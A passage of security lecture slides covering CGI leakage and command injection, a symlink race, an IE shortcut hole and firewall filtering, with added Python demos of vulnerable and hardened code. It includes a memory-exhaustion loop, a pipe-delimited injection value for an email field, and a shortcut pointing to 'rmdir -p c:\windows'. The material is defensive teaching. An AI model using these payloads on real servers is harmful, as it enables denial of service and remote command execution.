– leaking of information, which can lead to intrusion
– a remote user tricks the script into executing system commands
Information Leakage
• A CGI program can gather information about the visiting client (browser, IP address, referring page) without the user's knowledge
• Go to http://hoohoo.ncsa.uiuc.edu/cgi/examples.html
– and trigger the cgi script from your browser. The server will return the information it is able to obtain from the client.
Crashing a Web Server
• A malicious user can crash a Web server computer by running a CGI script that runs the following simple C program:
– for (;;) malloc(1024);
– the program will use up all available RAM of the Web server in seconds
– the Web server computer is completely nonfunctional
– This works only where CGI processes run without resource limits; a per-process memory limit (RLIMIT_AS, or a wrapper that sets one) confines the damage to the one script.
Result
• The Web server is still able to respond to pings.
– This means that common administrative programs which ping network servers periodically to ensure that servers are up and running will not notice anything wrong. A health check should fetch a page, not just ping.
– However, the computer will not be able to allocate memory to create any new process. Hence, all connection requests will be refused.
– Any connections that were already established will lock.
Incomplete Input Checking
• Example: Guestserver is a guestbook system that enables you to have your own guestbook on your homepage, without having all the scripts and data located on a completely different server.
• The Bug: guestbook.cgi is vulnerable to a remote command execution bug. This bug is caused by an incomplete filter of the email variable.
– The email variable is first filtered for HTML tags, then for commas, semicolons, and colons.
– But the | (pipe) character is not filtered!
– So we can construct an email variable with commands delimited by |'s and the cgi will happily execute these commands as long as it looks like a "normal" email address.
• An example email variable that would execute "bleh" on the remote server: "| bleh | [email protected]".
– This would result in the execution of:
"/bin/sh -c <mail program>|bleh|[email protected]"
– The lesson: a blacklist of bad characters is never complete. Validate against an allow-list of what a legitimate value may contain, and do not hand user data to a shell at all.
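The filter bug above, reproduced in Python beside a hardened version, as an added example (Guestserver itself was a Perl script; the code here follows the slide's description of the filter, not the original source). The mail program path /usr/lib/sendmail and the sample addresses are assumptions. Nothing is executed: the functions only build the command line, so the difference between the two approaches is visible without running anything.

```python
import re


def filter_like_guestserver(email):
    """The slide's filter: strip HTML tags, then commas, semicolons and colons.
    Every other shell metacharacter, '|' included, passes straight through."""
    email = re.sub(r"<[^>]*>", "", email)
    return re.sub(r"[,;:]", "", email)


def build_mail_command_vulnerable(email, mailer="/usr/lib/sendmail"):
    """The bug: filtered data interpolated into one string that is later handed
    to /bin/sh -c.  Returned here, never executed."""
    return f"{mailer} {filter_like_guestserver(email)}"


def shell_pipeline_commands(command_line):
    """Which programs /bin/sh would run for this line: the first word of each
    pipe-separated segment (str.split ignores quoting, enough for the demo)."""
    return [seg.split()[0] for seg in command_line.split("|") if seg.split()]


# Allow-list: the local part must start with a letter or digit (so the address
# can never be mistaken for a command-line option), then a conservative set.
EMAIL_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._%+-]*@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def accepts(email):
    """True if the address passes the allow-list."""
    return EMAIL_RE.match(email) is not None


def build_mail_command_safe(email, mailer="/usr/lib/sendmail"):
    """Hardened: validate against the allow-list, then pass the address as its
    own argv element (subprocess.run(argv) with no shell), so no metacharacter
    is ever interpreted."""
    if not accepts(email):
        raise ValueError(f"rejected email address: {email!r}")
    return [mailer, email]


if __name__ == "__main__":
    evil = "| bleh | victim@example.com"
    print(build_mail_command_vulnerable(evil))
    print(shell_pipeline_commands(build_mail_command_vulnerable(evil)))
    print(build_mail_command_safe("guest@example.com"))
    try:
        build_mail_command_safe(evil)
    except ValueError as e:
        print(e)
```

The two fixes are independent and both are needed: the allow-list rejects the payload, and the argv form means that even an address the regex wrongly accepted would reach the mailer as one argument rather than as shell syntax. The leading-character rule covers a second, quieter bug, argument injection, where an address such as `-oQ/tmp` is taken by sendmail as an option.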
Race Condition Bug
• A common security vulnerability is generated by careless system-level shell programs that create temporary files with improper protection.
• These files, if caught in time by the attacker, can be overwritten and possibly open up security risks.
• If the attacker can guess what the file name is, he can write a simple program that continuously checks for the file and acts as soon as the file's existence is detected (or, more simply, creates a symbolic link with that name in advance, so the privileged program writes wherever the link points).
• Example: the updatedb crontab script generates a /tmp/locatedb.XXXX file that is world-writable. The file is later moved without checking to /var/lib/locatedb.
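An added example, not the updatedb script itself: a predictable, world-writable temporary file written the careless way, an attacker who plants a symbolic link under that name first, and the safe alternatives (an unpredictable name from mkstemp, or a fixed name opened with O_CREAT|O_EXCL|O_NOFOLLOW so that an existing file or link makes creation fail instead of being followed). Everything happens inside a scratch directory the script creates and removes; the file names and the fixed "pid" 4242 are assumptions, and the demo needs a filesystem that allows unprivileged symbolic links.

```python
import os
import shutil
import tempfile


def insecure_write(tmpdir, data, pid=4242):
    """The careless pattern: predictable name, open() follows whatever is
    there, then the file is made world-writable (as in the locatedb bug)."""
    path = os.path.join(tmpdir, f"locatedb.{pid}")
    with open(path, "w") as f:          # follows a planted symlink
        f.write(data)
    os.chmod(path, 0o666)               # and chmods the link's target too
    return path


def plant_symlink(tmpdir, target, pid=4242):
    """Attacker who guessed the name wins the race by creating the link first."""
    os.symlink(target, os.path.join(tmpdir, f"locatedb.{pid}"))


def secure_write_random_name(tmpdir, data):
    """Fix 1: unguessable name, created atomically with mode 0600 by mkstemp."""
    fd, path = tempfile.mkstemp(prefix="locatedb.", dir=tmpdir)
    with os.fdopen(fd, "w") as f:
        f.write(data)
    return path


def secure_write_fixed_name(path, data):
    """Fix 2: fixed name, but O_CREAT|O_EXCL refuses an existing file or link,
    and O_NOFOLLOW (where available) never follows a symlink; raises
    FileExistsError if the attacker got there first."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(data)
    return path


def demo():
    """Run both scenarios in a scratch directory; return what happened."""
    tmpdir = tempfile.mkdtemp()
    result = {}
    try:
        victim = os.path.join(tmpdir, "important.conf")   # stands in for /etc/passwd
        with open(victim, "w") as f:
            f.write("original contents\n")

        # 1. Attacker plants the link, then the careless program writes.
        plant_symlink(tmpdir, victim, pid=4242)
        insecure_write(tmpdir, "attacker chosen data\n", pid=4242)
        with open(victim) as f:
            result["victim_after_insecure"] = f.read()
        result["victim_world_writable"] = bool(os.stat(victim).st_mode & 0o002)

        # 2. Same trick against the hardened writers.
        plant_symlink(tmpdir, victim, pid=4243)
        try:
            secure_write_fixed_name(os.path.join(tmpdir, "locatedb.4243"), "safe\n")
            result["fixed_name_refused"] = False
        except FileExistsError:
            result["fixed_name_refused"] = True
        rnd = secure_write_random_name(tmpdir, "safe\n")
        result["random_name_mode"] = os.stat(rnd).st_mode & 0o777
        with open(victim) as f:
            result["victim_after_secure"] = f.read()
    finally:
        shutil.rmtree(tmpdir)
    return result


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v!r}")
```

The second half of the slide's bug, the unchecked move into /var/lib, is the same mistake in the other direction: a rename of a path the attacker may control. Writing into a directory only the privileged program can write to, and using the file descriptor rather than re-opening by name, closes both windows.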
Hole in IE
• Discovered by Paul Greene
• Microsoft posted a 400k patch within 48
hrs
– What does that mean?
• Effects of attack are devastating
– We are VERY lucky that the “good guys” found this
one first!!!!
Background
• Win95 and NT shortcuts
– basically symbolic links
– stored in .lnk or .url files depending on where
they point
– contain relative or absolute paths to
executables
• When a user clicks on (executes) a
shortcut, the program it points to runs
The Attack
• When a shortcut appears in a
URL
– shortcuts are treated the same as local
ones
– Sample HTML segment on a page:
• <A HREF=“Attack.LNK”> Click here for a
reward. </A>
– When a user clicks
• Attack.LNK is downloaded to the machine
• the thing pointed to by Attack.LNK is
executed!!!!!
Result
• Using WIN95, Attack.LNK points to:
– c:\bin\mkdir c:\HAHAHA
– c:\bin\rmdir -p c:\windows
• Basic attack allows bad guy to
– download a pointer to any program on the machine
– include any arguments to the program
– execute it when you visit the page
• THIS IS VERY SERIOUS!!!!!!!!!!
Microsoft’s Fix
• Display a pop-up window
– “Save to disk or open?”
– Save - postpone danger
– Open - it will execute
1. Do users read pop-up windows?
2. Do users pay attention to pop-up windows?
3. Do users just click OK so they can continue?
Firewall
• A firewall is a hardware/software combination that restricts
access to or from a network resource
• A network resource is any addressable entity on a
computer network
• Firewalls may be a router with filters, a bridge with filters
and may also be a dedicated firewall system
• If the Internet is involved, a firewall is not an option - it is
an absolute necessity for survival
• There are different types for different reasons
What is Protected?
• Your data
– Secrecy - what others should not know
– Integrity - what others should not change
– Availability - your ability to use your own systems
• Your resources
– Your systems and their computational capabilities
• Your reputation
– Confidence is shaken in your organization
– Your site can be used as a launching point for crime
– You may be used as a distribution site for unwanted data
– You may be used by impostors to cause serious problems
– You may be viewed as "untrusted" by customers and peers
What can firewalls do?
• Focus for security decisions
• Enforce security policies
• Log network access efficiently
• Limit your exposure
• Provide traceback for intrusions
• Allow accurate accounting of activities
What firewalls can't do . . .
• No protection from malicious insiders
• No protection from connections that do not go through the firewall facilities
• No protection from completely new threats
• Can't protect against viruses without either a bastion host server with scanning software or session packet reconstruction and scanning
• Can't protect against what looks like a legitimate session from the "untrusted" side
Major Firewall Limitations
• Firewalls can only enforce security on packets that they get to process.
– A packet must pass through the firewall before a security decision can be made.
– All paths to and from the trusted network must pass through the firewall before reaching the untrusted network.
• Firewalls have a difficult time distinguishing between valid requests and malicious requests at the application layer.
– Ex: Exploits exist for certain web servers that look like normal, well formed, http requests.
Firewalls become
Targets
• If a hacker can take over your firewall,
they can attack your network at will.
• It is essential that the Firewall itself is
immune to penetration
– No unnecessary processes should be running
on the firewall
– The rule base should include rules to protect
the firewall.
Router vs. Firewall
• Many vendors have routers with filters in them
and claim to be a “firewall”
• True firewalls not only filter to a very fine
resolution, but also provide extensive tracking
and reporting; this means disk storage, file
management and printing are part of the system
• True firewalls offload filtering and scanning duties
from a router so that the router may do what it
was designed to do: route efficiently and quickly
Firewall Types
• Frame filtering
– Filters at layer 2 for specific types of security
• Packet filtering
– Filters to the bit level in every packet it sees
• Application filtering
– Also knows specific detail about application functions and can
filter application items
• Application proxy filtering
– Also can scan for specific application-specific conditions and
session data (user information)
• “Stateful” Inspection
– Does packet, application and some minimal proxy-like functions
Packet Filtering
[Diagram: External Network - Screening Router - Internal Network 192.168.4.0/24 (Other Hosts; Mail Server 192.168.4.5; Web Server 192.168.4.6)]
Filter Rules
Source IP       Source Port  Destination IP  Destination Port  Proto  Flags  Action  Description
192.168.4.0/24  Any          Any             Any               TCP    Any    Allow   Allow all of our traffic out
Any             Any          Any             > 1024            TCP    ACK    Allow   Allow replies to our calls
Any             Any          192.168.4.5     25                TCP    Any    Allow   Allow traffic to our mail server
Any             Any          192.168.4.6     80                TCP    Any    Allow   Allow traffic to our web server
Any             Any          Any             Any               Any    Any    Reject  Disallow all other traffic
Packet Filtering Issues
• Basic capability of most routers
• Rules are applied in order
• Limitations
– Decision is based on the current packet only (no context). The "allow replies" rule above, for instance, admits any packet with ACK set to any port above 1024, whether or not an internal host ever opened that connection.
– Packet header is usually the only source of information.
– Cannot block a large subset of illegitimate packets.
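The two rule tables on the slides (the red team's firewall and the screening router above) implemented as a first-match packet filter, as an added example that is not from the lecture. It also makes the "no context" limitation concrete: an attacker's ACK-only packet to a high port is admitted by the "allow replies" rule because a stateless filter cannot know whether an inside host ever made the call. A small anti-spoofing check of the kind the LAND slide mentions is included. The packets, the interface names, the 10.0.0.0/8 stand-in for the red team's "Private Net" and ServerA's address are constructed assumptions.

```python
import ipaddress
from dataclasses import dataclass

ANY = "Any"


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    proto: str                         # "TCP", "UDP", "ICMP"
    flags: frozenset = frozenset()     # e.g. frozenset({"SYN"}), frozenset({"ACK"})
    iface: str = "external"            # interface the packet arrived on


@dataclass(frozen=True)
class Rule:
    src: str        # CIDR, single address or ANY
    sport: object   # port number, "> N" or ANY
    dst: str
    dport: object
    proto: str
    flags: str      # a flag that must be set, or ANY
    action: str
    desc: str


def _ip_match(pattern, addr):
    if pattern == ANY:
        return True
    return ipaddress.ip_address(addr) in ipaddress.ip_network(pattern, strict=False)


def _port_match(pattern, port):
    if pattern == ANY:
        return True
    if isinstance(pattern, str) and pattern.startswith(">"):
        return port > int(pattern[1:])
    return port == int(pattern)


def _rule_matches(r, p):
    return (_ip_match(r.src, p.src) and _port_match(r.sport, p.sport)
            and _ip_match(r.dst, p.dst) and _port_match(r.dport, p.dport)
            and (r.proto == ANY or r.proto == p.proto)
            and (r.flags == ANY or r.flags in p.flags))


def evaluate(rules, pkt):
    """First matching rule decides; a table always ends with a catch-all."""
    for r in rules:
        if _rule_matches(r, pkt):
            return r.action, r.desc
    return "Reject", "implicit deny"


INTERNAL = "192.168.4.0/24"
SCREENING_ROUTER = [
    Rule(INTERNAL, ANY, ANY, ANY, "TCP", ANY, "Allow", "Allow all of our traffic out"),
    Rule(ANY, ANY, ANY, "> 1024", "TCP", "ACK", "Allow", "Allow replies to our calls"),
    Rule(ANY, ANY, "192.168.4.5", 25, "TCP", ANY, "Allow", "Allow traffic to our mail server"),
    Rule(ANY, ANY, "192.168.4.6", 80, "TCP", ANY, "Allow", "Allow traffic to our web server"),
    Rule(ANY, ANY, ANY, ANY, ANY, ANY, "Reject", "Disallow all other traffic"),
]

PRIVATE_NET = "10.0.0.0/8"   # assumption for the red team's "Private Net"
SERVER_A = "10.1.1.80"       # assumption: ServerA's address
RED_TEAM_FIREWALL = [
    Rule(PRIVATE_NET, ANY, ANY, ANY, "TCP", ANY, "Allow", "Allow all outbound traffic"),
    Rule(ANY, ANY, SERVER_A, 80, "TCP", ANY, "Allow", "Allow http requests to ServerA"),
    Rule(ANY, ANY, ANY, ANY, ANY, ANY, "Reject", "Disallow all other traffic"),
]


def anti_spoof(pkt, internal):
    """Checks a plain rule table cannot express: LAND (source equals destination)
    and an external packet claiming an internal source.  Returns a reason or None."""
    if pkt.src == pkt.dst and pkt.sport == pkt.dport:
        return "LAND: source equals destination"
    if pkt.iface == "external" and _ip_match(internal, pkt.src):
        return "spoofed internal source address on external interface"
    return None


def filter_packet(rules, pkt, internal=INTERNAL):
    """Anti-spoofing first, then the ordered rule table."""
    reason = anti_spoof(pkt, internal)
    return ("Reject", reason) if reason else evaluate(rules, pkt)


if __name__ == "__main__":
    ack_probe = Packet("1.2.3.4", 5555, "192.168.4.10", 6000, "TCP", frozenset({"ACK"}))
    print(filter_packet(SCREENING_ROUTER, ack_probe))     # admitted: no context
    land = Packet("192.168.4.6", 80, "192.168.4.6", 80, "TCP", frozenset({"SYN"}))
    print(evaluate(SCREENING_ROUTER, land), filter_packet(SCREENING_ROUTER, land))
```

Note that the LAND packet passes the bare rule table, because its forged source address matches the "all of our traffic out" rule; only the interface-aware anti-spoofing check stops it. This is the gap the stateful and proxy firewalls on the following slides close: a stateful filter admits an inbound ACK only if it belongs to a connection it saw an inside host open.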
Proxy Filter
• Makes it appear that the host and user are directly connected, but in reality everything is sent through a proxy server
[Diagram: User/Client - Proxy Server - External Host/Real Server; the client sees a "perceived connection" straight to the real server]
Proxy Operation
• Able to make decisions based on
application layer information inside the
packet.
• Supports robust, application aware
logging.
• Understands context of communication
for the protocols supported.
– Ex: Can allow ftp-data connections through to ftp
client without allowing all high port traffic through.
Summary
• Computer Crimes
• An Example Attack
• Network Intrusion Techniques
• Case Study: A Red Team Report
• Other Common Attacks
• Firewalls